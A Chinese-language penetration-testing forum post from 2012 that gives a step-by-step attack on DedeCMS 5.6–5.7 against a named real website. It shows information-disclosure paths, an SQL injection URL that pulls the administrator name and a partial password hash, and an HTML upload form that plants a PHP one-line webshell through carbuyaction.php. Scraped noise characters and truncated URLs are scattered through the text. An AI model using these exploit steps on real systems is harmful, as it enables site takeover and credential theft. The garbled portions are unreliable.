中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

---

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
这站 http://www.political-security.com/
" i4 G2 D5 I/ h5 w首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
www.political-security.com/data/mysql_error_trace.inc 爆后台
/ D' a& u9 P/ E9 q4 ?然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
& D8 w5 x) O' I1 B; w然后写上语句
, V' ~) x6 N8 p" V% h8 ]( |& {- E查看管理员帐号
8 E: l* s( s2 L- bhttp://www.political-security.co ... &membergroup=@`

admin
# {( |7 q% E% p; ?& S3 h$ O
查看管理员密码
, ?' u/ \% l. O& ~4 j, V/ q0 h　http://www.political-security.co ... &membergroup=@`

+ }. R% E# V2 B8d29b1ef9f8c5a5af429
- M: u# E( N4 D$ i; ~' w8 E% ?
) q: K- V5 w+ ^% m查看管理员密码
" F. x; {, S3 P; |
得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5

6 O$ Q1 g8 I8 P( F% X$ `# ^  K8d2
9b1ef9f8c5a5af42
9

cmd5没解出来 只好测试第二个方法


5 k! u& h" p0 y3 `0 L$ B$ X) U* U②上传漏洞：
# X: g$ a9 v9 p( m6 }
( S# z# L: V, f* L" o% w只要登陆会员中心，然后访问页面链接
4 b- }- n# l0 V. K( X' g1 w9 E, n5 C“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
) s! q9 Y/ q$ k0 X& M( M) m8 w4 b
" N% `  |$ g' ?; g5 P" u$ I如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
% z- N6 o! }5 Y& n. \
# F; d+ t7 [3 X- k于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
% c$ R% r) w' H
" T0 [8 f' H9 M( C: J# Y. q8 J/ Q<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
# i% n8 a. J! F0 P. T或者
9 O. ~  L6 s. P# H; g% B即可上传成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2